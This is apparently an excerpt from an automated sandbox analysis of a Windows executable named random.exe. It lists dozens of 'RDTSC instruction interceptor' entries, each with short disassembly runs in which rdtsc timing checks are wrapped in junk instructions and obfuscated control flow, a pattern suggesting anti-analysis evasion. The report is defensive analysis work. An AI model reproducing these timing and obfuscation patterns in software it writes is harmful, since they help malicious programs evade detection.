      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A0420 second address: 10A0466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA8D8E164A6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FA8D8E164AEh 0x00000012 nop 0x00000013 mov bl, al 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FA8D8E164A8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A0466 second address: 10A0470 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A641E second address: 10A6428 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA8D8E164ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F5B7 second address: 109F641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add bh, FFFFFFEAh 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov di, bx 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b mov dword ptr [ebp+122D2A93h], edi 0x00000021 mov eax, dword ptr [ebp+122D09E1h] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FA8D8E1DCF8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov edi, dword ptr [ebp+122D377Dh] 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FA8D8E1DCF8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 mov dword ptr [ebp+122D1B80h], ecx 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jng 00007FA8D8E1DCFCh 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F641 second address: 109F645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A170B second address: 10A1710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F645 second address: 109F64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A2758 second address: 10A27AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov di, F2E8h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a mov bx, F91Ah 0x0000001e mov eax, dword ptr [ebp+122D0159h] 0x00000024 movzx ebx, cx 0x00000027 push FFFFFFFFh 0x00000029 mov bx, CAB3h 0x0000002d and di, F9A3h 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FA8D8E1DCFFh 0x00000039 jns 00007FA8D8E1DCF8h 0x0000003f push esi 0x00000040 pop esi 0x00000041 popad 0x00000042 push eax 0x00000043 jnp 00007FA8D8E1DD08h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F64B second address: 109F64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A27AF second address: 10A27B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A65C5 second address: 10A65F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA8D8E164AFh 0x0000000e popad 0x0000000f push eax 0x00000010 jl 00007FA8D8E164B0h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AAFDD second address: 10AAFE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AAFE1 second address: 10AB02E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FA8D8E164B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA8D8E164B8h 0x00000016 jmp 00007FA8D8E164B3h 0x0000001b popad 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF013 second address: 10AF01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA8D8E1DCF6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF01D second address: 10AF029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF029 second address: 10AF034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA8D8E1DCF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF4A7 second address: 10AF4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4886 second address: 10B488A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B488A second address: 10B4890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B491A second address: 10B491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B491E second address: 10B4934 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FA8D8E164A8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4934 second address: 10B4975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FA8D8E1DD04h 0x00000013 jp 00007FA8D8E1DCF8h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FA8D8E1DCF8h 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4975 second address: 10B4985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164ACh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4985 second address: 10B4999 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4999 second address: 10B49AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA8D8E164A6h 0x0000000a popad 0x0000000b jbe 00007FA8D8E164ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4B53 second address: 10B4B93 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jp 00007FA8D8E1DD07h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA8D8E1DD06h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8561 second address: 10B8568 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8ABF second address: 10B8AC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8AC4 second address: 10B8ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FA8D8E164ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8C32 second address: 10B8C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8C44 second address: 10B8C79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FA8D8E164A6h 0x0000000d jmp 00007FA8D8E164B3h 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA8D8E164B1h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8F26 second address: 10B8F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90A3 second address: 10B90A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90A9 second address: 10B90BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90BF second address: 10B90C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90C3 second address: 10B90E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA8D8E1DCF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FA8D8E1DD02h 0x00000016 jc 00007FA8D8E1DCF6h 0x0000001c jo 00007FA8D8E1DCF6h 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90E5 second address: 10B90ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B9254 second address: 10B925F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA8D8E1DCF6h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B9597 second address: 10B95B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jc 00007FA8D8E164A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B970E second address: 10B9712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B9712 second address: 10B9721 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10BFE0F second address: 10BFE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10BFE15 second address: 10BFE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FA8D8E164A6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 je 00007FA8D8E164AAh 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push esi 0x00000024 pop esi 0x00000025 jmp 00007FA8D8E164ACh 0x0000002a pop esi 0x0000002b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10BF1B1 second address: 10BF1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFBh 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA8D8E1DCFFh 0x00000013 popad 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C2936 second address: 10C295D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA8D8E164B7h 0x0000000f jg 00007FA8D8E164A6h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C295D second address: 10C2961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C2961 second address: 10C296A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C296A second address: 10C2972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6CF3 second address: 10C6CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6CF7 second address: 10C6D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA8D8E1DD09h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6D22 second address: 10C6D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164AAh 0x00000008 jmp 00007FA8D8E164B8h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA8D8E164ADh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6EAD second address: 10C6EC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFFh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6EC0 second address: 10C6EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA8D8E164ADh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C72F4 second address: 10C7303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FA8D8E1DCF6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7303 second address: 10C7307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7307 second address: 10C7313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA8D8E1DCF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7313 second address: 10C7319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7319 second address: 10C731D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C75A8 second address: 10C75CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B9h 0x00000007 pushad 0x00000008 jnp 00007FA8D8E164A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C75CC second address: 10C75D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C75D2 second address: 10C75DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C78E3 second address: 10C7909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b js 00007FA8D8E1DCF6h 0x00000011 jnl 00007FA8D8E1DCF6h 0x00000017 pop ebx 0x00000018 jo 00007FA8D8E1DCFEh 0x0000001e jc 00007FA8D8E1DCF6h 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 104B148 second address: 104B14C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C80FE second address: 10C811C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6A4E second address: 10C6A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 ja 00007FA8D8E164A6h 0x0000000c pop ecx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6A5B second address: 10C6A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CCD46 second address: 10CCD9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA8D8E164C5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FA8D8E164B8h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jno 00007FA8D8E164ACh 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CCD9D second address: 10CCDA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10952B7 second address: 10952BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10952BB second address: 10761CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FA8D8E1DD03h 0x0000000d nop 0x0000000e mov edx, dword ptr [ebp+122D1A55h] 0x00000014 call dword ptr [ebp+1245D33Dh] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 push edx 0x00000021 jns 00007FA8D8E1DCF6h 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pop edx 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10954A4 second address: 10954B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164ABh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10954B3 second address: 10954B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095882 second address: 1095886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095886 second address: 109588C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109588C second address: 10958FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7F37F23Ah 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FA8D8E164A8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D19F3h], ebx 0x00000031 call 00007FA8D8E164A9h 0x00000036 push esi 0x00000037 jmp 00007FA8D8E164B3h 0x0000003c pop esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA8D8E164B9h 0x00000045 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10958FF second address: 1095918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD05h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095918 second address: 109591C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109591C second address: 1095969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 jmp 00007FA8D8E1DD00h 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FA8D8E1DD08h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA8D8E1DCFBh 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095A34 second address: 1095A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095AD6 second address: 1095ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095D94 second address: 1095D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10961E2 second address: 10961EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA8D8E1DCF6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10961EC second address: 1096240 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D1BD2h] 0x00000015 push 0000001Eh 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FA8D8E164A8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 jmp 00007FA8D8E164B3h 0x00000036 push eax 0x00000037 jo 00007FA8D8E164B0h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
